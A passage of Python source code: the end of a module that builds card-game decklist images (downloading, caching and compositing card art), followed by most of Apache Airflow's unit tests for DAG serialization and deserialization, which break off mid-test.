CardImage.HEIGHT_MARGIN*(n-1) + CardImage.HEIGHT
))
x = 0
y = 0
processed_basic_land_names = []
for key in image_array.keys(): # BASIC, NONBASIC
for card in image_array[key]:
if key == Key.BASIC:
if card.pretty_name in processed_basic_land_names:
continue
processed_basic_land_names.append(card.pretty_name)
self.composite_card_image(decklist_image, card, (x, y))
if key == Key.BASIC:
self.draw_translucence_rectangle(decklist_image, (round(x+CardImage.WIDTH*3/5), round(y+CardImage.HEIGHT_MARGIN*2/5)), (round(CardImage.WIDTH/3), round(CardImage.HEIGHT_MARGIN/2)), (0, 0, 0, 192))
self.draw_text(decklist_image, 'x '+str(basic_land_nums.get(card.pretty_name)), (x + CardImage.WIDTH*9/10, y + round(CardImage.HEIGHT_MARGIN*6.5/10)))
y += CardImage.HEIGHT_MARGIN
return decklist_image
@classmethod
def normalize_card_name(cls, card_name):
return sub(r'["*/:<>?\\\|]', '-', card_name)
def get_card_image_path(self, name, set, number):
# カード名の標準化
name = self.normalize_card_name(name)
# カード名.拡張子ファイルが存在する場合、そのパスを返す
for ext in self.downloader.FORMATS.values():
card_image_path = join(self.card_image_cache_dir, name + ext)
if exists(card_image_path):
return card_image_path
# カード名.拡張子ファイルが存在しない場合、CardImageDownloaderでカード画像をダウンロードする
card_image_data = self.downloader.get_card_image_data(set, number)
if card_image_data:
with Image.open(BytesIO(card_image_data)) as card_image:
format = card_image.format
if self.downloader.FORMATS.get(format):
card_image_path = join(self.card_image_cache_dir, name + self.downloader.FORMATS[format])
else:
card_image_path = join(self.card_image_cache_dir, name)
with open(card_image_path, 'wb') as card_image_file:
card_image_file.write(card_image_data)
return card_image_path
# カード画像がダウンロードできなかった場合、Noneを返す
return None
def composite_card_image(self, decklist_image, card, xy=(0, 0)):
# カード画像ファイルが存在すれば、そのカード画像を合成する
pretty_name = self.ALCHEMY_PREFIX+card.pretty_name if card.is_rebalanced else card.pretty_name
set = card.set
number = self.ALCHEMY_PREFIX+str(card.set_number) if card.is_rebalanced else card.set_number
card_image_path = self.get_card_image_path(pretty_name, set, number)
if card_image_path:
with Image.open(card_image_path) as card_image:
if card_image.width != CardImage.WIDTH or card_image.height != CardImage.HEIGHT:
# 必要に応じてリサイズ
card_image = card_image.resize((CardImage.WIDTH, CardImage.HEIGHT))
if card_image.format == 'PNG':
return decklist_image.alpha_composite(card_image, xy)
else:
# PNGでなければ貼り付け
return decklist_image.paste(card_image, xy)
else:
# カード画像ファイルが存在しなければダミー画像を合成する
card_image = self.generate_dummy_card_image(pretty_name)
return decklist_image.alpha_composite(card_image, xy)
def save_set_all_images(self, set):
names = self.downloader.save_set_all_images(set, self.card_image_cache_dir)
return names
@classmethod
def draw_translucence_rectangle(cls, decklist_image, xy=(0, 0), size=(0, 0), fill=(0, 0, 0, 0)):
rectangle = Image.new('RGBA', size)
draw = ImageDraw.Draw(rectangle)
draw.rectangle((0, 0) + size, fill)
return decklist_image.alpha_composite(rectangle, xy)
@classmethod
def generate_dummy_card_image(cls, card_name):
outer_size = (0, 0, CardImage.WIDTH, CardImage.HEIGHT)
inner_size = (11, 11, CardImage.WIDTH-11, CardImage.HEIGHT-11)
dummy_card_image = Image.new('RGBA', (CardImage.WIDTH, CardImage.HEIGHT))
draw = ImageDraw.Draw(dummy_card_image)
draw.rectangle(outer_size, (0, 22, 34, 255))
draw.rectangle(inner_size, (192, 192, 192, 255))
font = ImageFont.truetype('meiryo', 12)
draw.text((21, 21), card_name, fill=(0, 0, 0, 255), font=font)
return dummy_card_image
@classmethod
def draw_text(cls, image, text, xy=(0, 0)):
draw = ImageDraw.Draw(image)
font = ImageFont.truetype('meiryo', 32)
# draw.text((xy[0]+3, xy[1]+3), text, fill=(0, 0, 0), font=font, anchor='rm')
draw.text(xy, text, fill=(255, 255, 255), font=font, anchor='rm')
|
test_dag_serialization.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Unit tests for stringified DAGs."""
import importlib
import importlib.util
import multiprocessing
import os
import unittest
from datetime import datetime, timedelta, timezone
from glob import glob
from unittest import mock
import pytest
from dateutil.relativedelta import FR, relativedelta
from kubernetes.client import models as k8s
from parameterized import parameterized
from airflow.hooks.base_hook import BaseHook
from airflow.kubernetes.pod_generator import PodGenerator
from airflow.models import DAG, Connection, DagBag, TaskInstance
from airflow.models.baseoperator import BaseOperator, BaseOperatorLink
from airflow.operators.bash import BashOperator
from airflow.security import permissions
from airflow.serialization.json_schema import load_dag_schema_dict
from airflow.serialization.serialized_objects import SerializedBaseOperator, SerializedDAG
from tests.test_utils.mock_operators import CustomOperator, CustomOpLink, GoogleLink
executor_config_pod = k8s.V1Pod(
metadata=k8s.V1ObjectMeta(name="my-name"),
spec=k8s.V1PodSpec(
containers=[
k8s.V1Container(name="base", volume_mounts=[k8s.V1VolumeMount(name="my-vol", mount_path="/vol/")])
]
),
)
serialized_simple_dag_ground_truth = {
"__version": 1,
"dag": {
"default_args": {
"__type": "dict",
"__var": {
"depends_on_past": False,
"retries": 1,
"retry_delay": {"__type": "timedelta", "__var": 300.0},
},
},
"start_date": 1564617600.0,
'_task_group': {
'_group_id': None,
'prefix_group_id': True,
'children': {'bash_task': ('operator', 'bash_task'), 'custom_task': ('operator', 'custom_task')},
'tooltip': '',
'ui_color': 'CornflowerBlue',
'ui_fgcolor': '#000',
'upstream_group_ids': [],
'downstream_group_ids': [],
'upstream_task_ids': [],
'downstream_task_ids': [],
},
"is_paused_upon_creation": False,
"_dag_id": "simple_dag",
"fileloc": None,
"tasks": [
{
"task_id": "bash_task",
"owner": "airflow",
"retries": 1,
"retry_delay": 300.0,
"_downstream_task_ids": [],
"_inlets": [],
"_outlets": [],
"ui_color": "#f0ede4",
"ui_fgcolor": "#000",
"template_fields": ['bash_command', 'env'],
"template_fields_renderers": {'bash_command': 'bash', 'env': 'json'},
"bash_command": "echo {{ task.task_id }}",
'label': 'bash_task',
"_task_type": "BashOperator",
"_task_module": "airflow.operators.bash",
"pool": "default_pool",
"executor_config": {
'__type': 'dict',
'__var': {
"pod_override": {
'__type': 'k8s.V1Pod',
'__var': PodGenerator.serialize_pod(executor_config_pod),
}
},
},
},
{
"task_id": "custom_task",
"retries": 1,
"retry_delay": 300.0,
"_downstream_task_ids": [],
"_inlets": [],
"_outlets": [],
"_operator_extra_links": [{"tests.test_utils.mock_operators.CustomOpLink": {}}],
"ui_color": "#fff",
"ui_fgcolor": "#000",
"template_fields": ['bash_command'],
"template_fields_renderers": {},
"_task_type": "CustomOperator",
"_task_module": "tests.test_utils.mock_operators",
"pool": "default_pool",
'label': 'custom_task',
},
],
"timezone": "UTC",
"_access_control": {
"__type": "dict",
"__var": {
"test_role": {
"__type": "set",
"__var": [permissions.ACTION_CAN_READ, permissions.ACTION_CAN_EDIT],
}
},
},
},
}
ROOT_FOLDER = os.path.realpath(
os.path.join(os.path.dirname(os.path.realpath(__file__)), os.pardir, os.pardir)
)
def make_example_dags(module_path):
"""Loads DAGs from a module for test."""
dagbag = DagBag(module_path)
return dagbag.dags
def make_simple_dag():
"""Make very simple DAG to verify serialization result."""
with DAG(
dag_id='simple_dag',
default_args={
"retries": 1,
"retry_delay": timedelta(minutes=5),
"depends_on_past": False,
},
start_date=datetime(2019, 8, 1),
is_paused_upon_creation=False,
access_control={"test_role": {permissions.ACTION_CAN_READ, permissions.ACTION_CAN_EDIT}},
) as dag:
CustomOperator(task_id='custom_task')
BashOperator(
task_id='bash_task',
bash_command='echo {{ task.task_id }}',
owner='airflow',
executor_config={"pod_override": executor_config_pod},
)
return {'simple_dag': dag}
def make_user_defined_macro_filter_dag():
"""Make DAGs with user defined macros and filters using locally defined methods.
For Webserver, we do not include ``user_defined_macros`` & ``user_defined_filters``.
The examples here test:
(1) functions can be successfully displayed on UI;
(2) templates with function macros have been rendered before serialization.
"""
def compute_next_execution_date(dag, execution_date):
return dag.following_schedule(execution_date)
default_args = {'start_date': datetime(2019, 7, 10)}
dag = DAG(
'user_defined_macro_filter_dag',
default_args=default_args,
user_defined_macros={
'next_execution_date': compute_next_execution_date,
},
user_defined_filters={'hello': lambda name: 'Hello %s' % name},
catchup=False,
)
BashOperator(
task_id='echo',
bash_command='echo "{{ next_execution_date(dag, execution_date) }}"',
dag=dag,
)
return {dag.dag_id: dag}
def collect_dags(dag_folder=None):
"""Collects DAGs to test."""
dags = {}
dags.update(make_simple_dag())
dags.update(make_user_defined_macro_filter_dag())
if dag_folder:
if isinstance(dag_folder, (list, tuple)):
patterns = dag_folder
else:
patterns = [dag_folder]
else:
patterns = [
"airflow/example_dags",
"airflow/providers/*/example_dags",
"airflow/providers/*/*/example_dags",
]
for pattern in patterns:
for directory in glob(f"{ROOT_FOLDER}/{pattern}"):
dags.update(make_example_dags(directory))
# Filter subdags as they are stored in same row in Serialized Dag table
dags = {dag_id: dag for dag_id, dag in dags.items() if not dag.is_subdag}
return dags
def serialize_subprocess(queue, dag_folder):
"""Validate pickle in a subprocess."""
dags = collect_dags(dag_folder)
for dag in dags.values():
queue.put(SerializedDAG.to_json(dag))
queue.put(None)
class TestStringifiedDAGs(unittest.TestCase):
"""Unit tests for stringified DAGs."""
def setUp(self):
super().setUp()
BaseHook.get_connection = mock.Mock(
return_value=Connection(
extra=(
'{'
'"project_id": "mock", '
'"location": "mock", '
'"instance": "mock", '
'"database_type": "postgres", '
'"use_proxy": "False", '
'"use_ssl": "False"'
'}'
)
)
)
self.maxDiff = None # pylint: disable=invalid-name
def test_serialization(self):
"""Serialization and deserialization should work for every DAG and Operator."""
dags = collect_dags()
serialized_dags = {}
for _, v in dags.items():
dag = SerializedDAG.to_dict(v)
SerializedDAG.validate_schema(dag)
serialized_dags[v.dag_id] = dag
# Compares with the ground truth of JSON string.
self.validate_serialized_dag(serialized_dags['simple_dag'], serialized_simple_dag_ground_truth)
def validate_serialized_dag(self, json_dag, ground_truth_dag):
"""Verify serialized DAGs match the ground truth."""
self.assertTrue(json_dag['dag']['fileloc'].split('/')[-1] == 'test_dag_serialization.py')
json_dag['dag']['fileloc'] = None
def sorted_serialized_dag(dag_dict: dict):
"""
Sorts the "tasks" list and "access_control" permissions in the
serialised dag python dictionary. This is needed as the order of
items should not matter but assertEqual would fail if the order of
items changes in the dag dictionary
"""
dag_dict["dag"]["tasks"] = sorted(dag_dict["dag"]["tasks"], key=lambda x: sorted(x.keys()))
dag_dict["dag"]["_access_control"]["__var"]["test_role"]["__var"] = sorted(
dag_dict["dag"]["_access_control"]["__var"]["test_role"]["__var"]
)
return dag_dict
assert sorted_serialized_dag(ground_truth_dag) == sorted_serialized_dag(json_dag)
@pytest.mark.quarantined
def test_deserialization_across_process(self):
"""A serialized DAG can be deserialized in another process."""
# Since we need to parse the dags twice here (once in the subprocess,
# and once here to get a DAG to compare to) we don't want to load all
# dags.
queue = multiprocessing.Queue()
proc = multiprocessing.Process(target=serialize_subprocess, args=(queue, "airflow/example_dags"))
proc.daemon = True
proc.start()
stringified_dags = {}
while True:
v = queue.get()
if v is None:
break
dag = SerializedDAG.from_json(v)
self.assertTrue(isinstance(dag, DAG))
stringified_dags[dag.dag_id] = dag
dags = collect_dags("airflow/example_dags")
assert set(stringified_dags.keys()) == set(dags.keys())
# Verify deserialized DAGs.
for dag_id in stringified_dags:
self.validate_deserialized_dag(stringified_dags[dag_id], dags[dag_id])
def test_roundtrip_provider_example_dags(self):
dags = collect_dags(
[
"airflow/providers/*/example_dags",
"airflow/providers/*/*/example_dags",
]
)
# Verify deserialized DAGs.
for dag in dags.values():
serialized_dag = SerializedDAG.from_json(SerializedDAG.to_json(dag))
self.validate_deserialized_dag(serialized_dag, dag)
def validate_deserialized_dag(self, serialized_dag, dag):
"""
Verify that all example DAGs work with DAG Serialization by
checking fields between Serialized Dags & non-Serialized Dags
"""
fields_to_check = dag.get_serialized_fields() - {
# Doesn't implement __eq__ properly. Check manually
'timezone',
# Need to check fields in it, to exclude functions
'default_args',
"_task_group",
}
for field in fields_to_check:
assert getattr(serialized_dag, field) == getattr(
dag, field
), f'{dag.dag_id}.{field} does not match'
if dag.default_args:
for k, v in dag.default_args.items():
if callable(v):
# Check we stored _something_.
assert k in serialized_dag.default_args
else:
assert (
v == serialized_dag.default_args[k]
), f'{dag.dag_id}.default_args[{k}] does not match'
assert serialized_dag.timezone.name == dag.timezone.name
for task_id in dag.task_ids:
self.validate_deserialized_task(serialized_dag.get_task(task_id), dag.get_task(task_id))
# Verify that the DAG object has 'full_filepath' attribute
# and is equal to fileloc
assert serialized_dag.full_filepath == dag.fileloc
def validate_deserialized_task(
self,
serialized_task,
task,
):
"""Verify non-airflow operators are casted to BaseOperator."""
assert isinstance(serialized_task, SerializedBaseOperator)
assert not isinstance(task, SerializedBaseOperator)
assert isinstance(task, BaseOperator)
fields_to_check = task.get_serialized_fields() - {
# Checked separately
'_task_type',
'subdag',
# Type is excluded, so don't check it
'_log',
# List vs tuple. Check separately
'template_fields',
# We store the string, real dag has the actual code
'on_failure_callback',
'on_success_callback',
'on_retry_callback',
# Checked separately
'resources',
}
assert serialized_task.task_type == task.task_type
assert set(serialized_task.template_fields) == set(task.template_fields)
assert serialized_task.upstream_task_ids == task.upstream_task_ids
assert serialized_task.downstream_task_ids == task.downstream_task_ids
for field in fields_to_check:
assert getattr(serialized_task, field) == getattr(
task, field
), f'{task.dag.dag_id}.{task.task_id}.{field} does not match'
if serialized_task.resources is None:
assert task.resources is None or task.resources == []
else:
assert serialized_task.resources == task.resources
# Check that for Deserialised task, task.subdag is None for all other Operators
# except for the SubDagOperator where task.subdag is an instance of DAG object
if task.task_type == "SubDagOperator":
assert serialized_task.subdag is not None
assert isinstance(serialized_task.subdag, DAG)
else:
assert serialized_task.subdag is None
@parameterized.expand(
[
(datetime(2019, 8, 1, tzinfo=timezone.utc), None, datetime(2019, 8, 1, tzinfo=timezone.utc)),
(
datetime(2019, 8, 1, tzinfo=timezone.utc),
datetime(2019, 8, 2, tzinfo=timezone.utc),
datetime(2019, 8, 2, tzinfo=timezone.utc),
),
(
datetime(2019, 8, 1, tzinfo=timezone.utc),
datetime(2019, 7, 30, tzinfo=timezone.utc),
datetime(2019, 8, 1, tzinfo=timezone.utc),
),
]
)
def test_deserialization_start_date(self, dag_start_date, task_start_date, expected_task_start_date):
dag = DAG(dag_id='simple_dag', start_date=dag_start_date)
BaseOperator(task_id='simple_task', dag=dag, start_date=task_start_date)
serialized_dag = SerializedDAG.to_dict(dag)
if not task_start_date or dag_start_date >= task_start_date:
# If dag.start_date > task.start_date -> task.start_date=dag.start_date
# because of the logic in dag.add_task()
self.assertNotIn("start_date", serialized_dag["dag"]["tasks"][0])
else:
self.assertIn("start_date", serialized_dag["dag"]["tasks"][0])
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
self.assertEqual(simple_task.start_date, expected_task_start_date)
def test_deserialization_with_dag_context(self):
with DAG(dag_id='simple_dag', start_date=datetime(2019, 8, 1, tzinfo=timezone.utc)) as dag:
BaseOperator(task_id='simple_task')
# should not raise RuntimeError: dictionary changed size during iteration
SerializedDAG.to_dict(dag)
@parameterized.expand(
[
(datetime(2019, 8, 1, tzinfo=timezone.utc), None, datetime(2019, 8, 1, tzinfo=timezone.utc)),
(
datetime(2019, 8, 1, tzinfo=timezone.utc),
datetime(2019, 8, 2, tzinfo=timezone.utc),
datetime(2019, 8, 1, tzinfo=timezone.utc),
),
(
datetime(2019, 8, 1, tzinfo=timezone.utc),
datetime(2019, 7, 30, tzinfo=timezone.utc),
datetime(2019, 7, 30, tzinfo=timezone.utc),
),
]
)
def test_deserialization_end_date(self, dag_end_date, task_end_date, expected_task_end_date):
dag = DAG(dag_id='simple_dag', start_date=datetime(2019, 8, 1), end_date=dag_end_date)
BaseOperator(task_id='simple_task', dag=dag, end_date=task_end_date)
serialized_dag = SerializedDAG.to_dict(dag)
if not task_end_date or dag_end_date <= task_end_date:
# If dag.end_date < task.end_date -> task.end_date=dag.end_date
# because of the logic in dag.add_task()
self.assertNotIn("end_date", serialized_dag["dag"]["tasks"][0])
else:
self.assertIn("end_date", serialized_dag["dag"]["tasks"][0])
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
self.assertEqual(simple_task.end_date, expected_task_end_date)
@parameterized.expand(
[
(None, None, None),
("@weekly", "@weekly", "0 0 * * 0"),
("@once", "@once", None),
({"__type": "timedelta", "__var": 86400.0}, timedelta(days=1), timedelta(days=1)),
]
)
def test_deserialization_schedule_interval(
self, serialized_schedule_interval, expected_schedule_interval, expected_n_schedule_interval
):
serialized = {
"__version": 1,
"dag": {
"default_args": {"__type": "dict", "__var": {}},
"_dag_id": "simple_dag",
"fileloc": __file__,
"tasks": [],
"timezone": "UTC",
"schedule_interval": serialized_schedule_interval,
},
}
SerializedDAG.validate_schema(serialized)
dag = SerializedDAG.from_dict(serialized)
self.assertEqual(dag.schedule_interval, expected_schedule_interval)
self.assertEqual(dag.normalized_schedule_interval, expected_n_schedule_interval)
@parameterized.expand(
[
(relativedelta(days=-1), {"__type": "relativedelta", "__var": {"days": -1}}),
(relativedelta(month=1, days=-1), {"__type": "relativedelta", "__var": {"month": 1, "days": -1}}),
# Every friday
(relativedelta(weekday=FR), {"__type": "relativedelta", "__var": {"weekday": [4]}}),
# Every second friday
(relativedelta(weekday=FR(2)), {"__type": "relativedelta", "__var": {"weekday": [4, 2]}}),
]
)
def test_roundtrip_relativedelta(self, val, expected):
serialized = SerializedDAG._serialize(val)
self.assertDictEqual(serialized, expected)
round_tripped = SerializedDAG._deserialize(serialized)
self.assertEqual(val, round_tripped)
@parameterized.expand(
[
(None, {}),
({"param_1": "value_1"}, {"param_1": "value_1"}),
]
)
def test_dag_params_roundtrip(self, val, expected_val):
"""
Test that params work both on Serialized DAGs & Tasks
"""
dag = DAG(dag_id='simple_dag', params=val)
BaseOperator(task_id='simple_task', dag=dag, start_date=datetime(2019, 8, 1))
serialized_dag = SerializedDAG.to_dict(dag)
if val:
self.assertIn("params", serialized_dag["dag"])
else:
self.assertNotIn("params", serialized_dag["dag"])
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
deserialized_simple_task = deserialized_dag.task_dict["simple_task"]
self.assertEqual(expected_val, deserialized_dag.params)
self.assertEqual(expected_val, deserialized_simple_task.params)
@parameterized.expand(
[
(None, {}),
({"param_1": "value_1"}, {"param_1": "value_1"}),
]
)
def test_task_params_roundtrip(self, val, expected_val):
"""
Test that params work both on Serialized DAGs & Tasks
"""
dag = DAG(dag_id='simple_dag')
BaseOperator(task_id='simple_task', dag=dag, params=val, start_date=datetime(2019, 8, 1))
serialized_dag = SerializedDAG.to_dict(dag)
if val:
self.assertIn("params", serialized_dag["dag"]["tasks"][0])
else:
self.assertNotIn("params", serialized_dag["dag"]["tasks"][0])
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
deserialized_simple_task = deserialized_dag.task_dict["simple_task"]
self.assertEqual(expected_val, deserialized_simple_task.params)
def test_extra_serialized_field_and_operator_links(self):
"""
Assert extra field exists & OperatorLinks defined in Plugins and inbuilt Operator Links.
This tests also depends on GoogleLink() registered as a plugin
in tests/plugins/test_plugin.py
The function tests that if extra operator links are registered in plugin
in ``operator_extra_links`` and the same is also defined in
the Operator in ``BaseOperator.operator_extra_links``, it has the correct
extra link.
"""
test_date = datetime(2019, 8, 1)
dag = DAG(dag_id='simple_dag', start_date=test_date)
CustomOperator(task_id='simple_task', dag=dag, bash_command="true")
serialized_dag = SerializedDAG.to_dict(dag)
self.assertIn("bash_command", serialized_dag["dag"]["tasks"][0])
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
self.assertEqual(getattr(simple_task, "bash_command"), "true")
#########################################################
# Verify Operator Links work with Serialized Operator
#########################################################
# Check Serialized version of operator link only contains the inbuilt Op Link
self.assertEqual(
serialized_dag["dag"]["tasks"][0]["_operator_extra_links"],
[{'tests.test_utils.mock_operators.CustomOpLink': {}}],
)
# Test all the extra_links are set
self.assertCountEqual(simple_task.extra_links, ['Google Custom', 'airflow', 'github', 'google'])
ti = TaskInstance(task=simple_task, execution_date=test_date)
ti.xcom_push('search_query', "dummy_value_1")
# Test Deserialized inbuilt link
custom_inbuilt_link = simple_task.get_extra_links(test_date, CustomOpLink.name)
self.assertEqual('http://google.com/custom_base_link?search=dummy_value_1', custom_inbuilt_link)
# Test Deserialized link registered via Airflow Plugin
google_link_from_plugin = simple_task.get_extra_links(test_date, GoogleLink.name)
self.assertEqual("https://www.google.com", google_link_from_plugin)
def test_extra_operator_links_logs_error_for_non_registered_extra_links(self):
"""
Assert OperatorLinks not registered via Plugins and if it is not an inbuilt Operator Link,
it can still deserialize the DAG (does not error) but just logs an error
"""
class TaskStateLink(BaseOperatorLink):
"""OperatorLink not registered via Plugins nor a built-in OperatorLink"""
name = 'My Link'
def get_link(self, operator, dttm):
return 'https://www.google.com'
class MyOperator(BaseOperator):
"""Just a DummyOperator using above defined Extra Operator Link"""
operator_extra_links = [TaskStateLink()]
def execute(self, context):
pass
with DAG(dag_id='simple_dag', start_date=datetime(2019, 8, 1)) as dag:
MyOperator(task_id='blah')
serialized_dag = SerializedDAG.to_dict(dag)
with self.assertLogs("airflow.serialization.serialized_objects", level="ERROR") as log_output:
SerializedDAG.from_dict(serialized_dag)
received_logs = log_output.output[0]
expected_err_msg = (
"Operator Link class 'tests.serialization.test_dag_serialization.TaskStateLink' "
"not registered"
)
assert expected_err_msg in received_logs
def test_extra_serialized_field_and_multiple_operator_links(self):
"""
Assert extra field exists & OperatorLinks defined in Plugins and inbuilt Operator Links.
This tests also depends on GoogleLink() registered as a plugin
in tests/plugins/test_plugin.py
The function tests that if extra operator links are registered in plugin
in ``operator_extra_links`` and the same is also defined in
the Operator in ``BaseOperator.operator_extra_links``, it has the correct
extra link.
"""
test_date = datetime(2019, 8, 1)
dag = DAG(dag_id='simple_dag', start_date=test_date)
CustomOperator(task_id='simple_task', dag=dag, bash_command=["echo", "true"])
serialized_dag = SerializedDAG.to_dict(dag)
self.assertIn("bash_command", serialized_dag["dag"]["tasks"][0])
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
self.assertEqual(getattr(simple_task, "bash_command"), ["echo", "true"])
#########################################################
# Verify Operator Links work with Serialized Operator
#########################################################
# Check Serialized version of operator link only contains the inbuilt Op Link
self.assertEqual(
serialized_dag["dag"]["tasks"][0]["_operator_extra_links"],
[
{'tests.test_utils.mock_operators.CustomBaseIndexOpLink': {'index': 0}},
{'tests.test_utils.mock_operators.CustomBaseIndexOpLink': {'index': 1}},
],
)
# Test all the extra_links are set
self.assertCountEqual(
simple_task.extra_links,
['BigQuery Console #1', 'BigQuery Console #2', 'airflow', 'github', 'google'],
)
ti = TaskInstance(task=simple_task, execution_date=test_date)
ti.xcom_push('search_query', ["dummy_value_1", "dummy_value_2"])
# Test Deserialized inbuilt link #1
custom_inbuilt_link = simple_task.get_extra_links(test_date, "BigQuery Console #1")
self.assertEqual('https://console.cloud.google.com/bigquery?j=dummy_value_1', custom_inbuilt_link)
# Test Deserialized inbuilt link #2
custom_inbuilt_link = simple_task.get_extra_links(test_date, "BigQuery Console #2")
self.assertEqual('https://console.cloud.google.com/bigquery?j=dummy_value_2', custom_inbuilt_link)
# Test Deserialized link registered via Airflow Plugin
google_link_from_plugin = simple_task.get_extra_links(test_date, GoogleLink.name)
self.assertEqual("https://www.google.com", google_link_from_plugin)
class ClassWithCustomAttributes:
"""
Class for testing purpose: allows to create objects with custom attributes in one single statement.
"""
def __init__(self, **kwargs):
for key, value in kwargs.items():
setattr(self, key, value)
def __str__(self):
return "{}({})".format(self.__class__.__name__, str(self.__dict__))
def __repr__(self):
return self.__str__()
def __eq__(self, other):
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self.__eq__(other)
@parameterized.expand(
[
(None, None),
([], []),
({}, {}),
("{{ task.task_id }}", "{{ task.task_id }}"),
(["{{ task.task_id }}", "{{ task.task_id }}"]),
({"foo": "{{ task.task_id }}"}, {"foo": "{{ task.task_id }}"}),
({"foo": {"bar": "{{ task.task_id }}"}}, {"foo": {"bar": "{{ task.task_id }}"}}),
(
[{"foo1": {"bar": "{{ task.task_id }}"}}, {"foo2": {"bar": "{{ task.task_id }}"}}],
[{"foo1": {"bar": "{{ task.task_id }}"}}, {"foo2": {"bar": "{{ task.task_id }}"}}],
),
(
{"foo": {"bar": {"{{ task.task_id }}": ["sar"]}}},
{"foo": {"bar": {"{{ task.task_id }}": ["sar"]}}},
),
(
ClassWithCustomAttributes(
att1="{{ task.task_id }}", att2="{{ task.task_id }}", template_fields=["att1"]
),
"ClassWithCustomAttributes("
"{'att1': '{{ task.task_id }}', 'att2': '{{ task.task_id }}', 'template_fields': ['att1']})",
),
(
ClassWithCustomAttributes(
nested1=ClassWithCustomAttributes(
att1="{{ task.task_id }}", att2="{{ task.task_id }}", template_fields=["att1"]
),
nested2=ClassWithCustomAttributes(
att3="{{ task.task_id }}", att4="{{ task.task_id }}", template_fields=["att3"]
),
template_fields=["nested1"],
),
"ClassWithCustomAttributes("
"{'nested1': ClassWithCustomAttributes({'att1': '{{ task.task_id }}', "
"'att2': '{{ task.task_id }}', 'template_fields': ['att1']}), "
"'nested2': ClassWithCustomAttributes({'att3': '{{ task.task_id }}', 'att4': "
"'{{ task.task_id }}', 'template_fields': ['att3']}), 'template_fields': ['nested1']})",
),
]
)
def test_templated_fields_exist_in_serialized_dag(self, templated_field, expected_field):
"""
Test that templated_fields exists for all Operators in Serialized DAG
Since we don't want to inflate arbitrary python objects (it poses a RCE/security risk etc.)
we want check that non-"basic" objects are turned in to strings after deserializing.
"""
dag = DAG("test_serialized_template_fields", start_date=datetime(2019, 8, 1))
with dag:
BashOperator(task_id="test", bash_command=templated_field)
serialized_dag = SerializedDAG.to_dict(dag)
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
deserialized_test_task = deserialized_dag.task_dict["test"]
self.assertEqual(expected_field, getattr(deserialized_test_task, "bash_command"))
def test_dag_serialized_fields_with_schema(self):
"""
Additional Properties are disabled on DAGs. This test verifies that all the
keys in DAG.get_serialized_fields are listed in Schema definition.
"""
dag_schema: dict = load_dag_schema_dict()["definitions"]["dag"]["properties"]
# The parameters we add manually in Serialization needs to be ignored
ignored_keys: set = {"is_subdag", "tasks"}
dag_params: set = set(dag_schema.keys()) - ignored_keys
self.assertEqual(set(DAG.get_serialized_fields()), dag_params)
def test_operator_subclass_changing_base_defaults(self):
assert (
BaseOperator(task_id='dummy').do_xcom_push is True
), "Precondition check! If this fails the test won't make sense"
class MyOperator(BaseOperator):
def __init__(self, do_xcom_push=False, **kwargs):
super().__init__(**kwargs)
self.do_xcom_push = do_xcom_push
op = MyOperator(task_id='dummy')
assert op.do_xcom_push is False
blob = SerializedBaseOperator.serialize_operator(op)
serialized_op = SerializedBaseOperator.deserialize_operator(blob)
assert serialized_op.do_xcom_push is False
def test_no_new_fields_added_to_base_operator(self):
"""
This test verifies that there are no new fields added to BaseOperator. And reminds that
tests should be added for it.
"""
base_operator = BaseOperator(task_id="10")
fields = base_operator.__dict__
self.assertEqual(
{
'_BaseOperator__instantiated': True,
'_dag': None,
'_downstream_task_ids': set(),
'_inlets': [],
'_log': base_operator.log,
'_outlets': [],
'_upstream_task_ids': set(),
'depends_on_past': False,
'do_xcom_push': True,
'email': None,
'email_on_failure': True,
'email_on_retry': True,
'end_date': None,
'execution_timeout': None,
'executor_config': {},
'inlets': [],
'label': '10',
'max_retry_delay': None,
'on_execute_callback': None,
'on_failure_callback': None,
'on_retry_callback': None,
'on_success_callback': None,
'outlets': [],
'owner': 'airflow',
'params': {},
'pool': 'default_pool',
'pool_slots': 1,
'priority_weight': 1,
'queue': 'default',
'resources': None,
'retries': 0,
'retry_delay': timedelta(0, 300),
'retry_exponential_backoff': False,
'run_as_user': None,
'sla': None,
'start_date': None,
'subdag': None,
'task_concurrency': None,
'task_id': '10',
'trigger_rule': 'all_success',
'wait_for_downstream': False,
'weight_rule': 'downstream',
},
fields,
"""
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
ACTION NEEDED! PLEASE READ THIS CAREFULLY AND CORRECT TESTS CAREFULLY
Some fields were added to the BaseOperator! Please add them to the list above and make sure that
you add support for DAG serialization - you should add the field to
`airflow/serialization/schema.json` - they should have correct type defined there.
Note that we do not support versioning yet so you should only add optional fields to BaseOperator.
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
""",
)
def test_task_group_serialization(self):
"""
Test TaskGroup serialization/deserialization.
"""
from airflow.operators.dummy_operator import DummyOperator
from airflow.utils.task_group import TaskGroup
execution_date = datetime(2020, 1, 1)
with DAG("test_task_group_serialization", start_date=execution_date) as dag:
task1 = DummyOperator(task_id="task1")
with TaskGroup("group234") as group234:
_ = DummyOperator(task_id="task2")
with TaskGroup("group34") as group34:
_ = DummyOperator(task_id="task3")
_ = DummyOperator(task_id="task4")
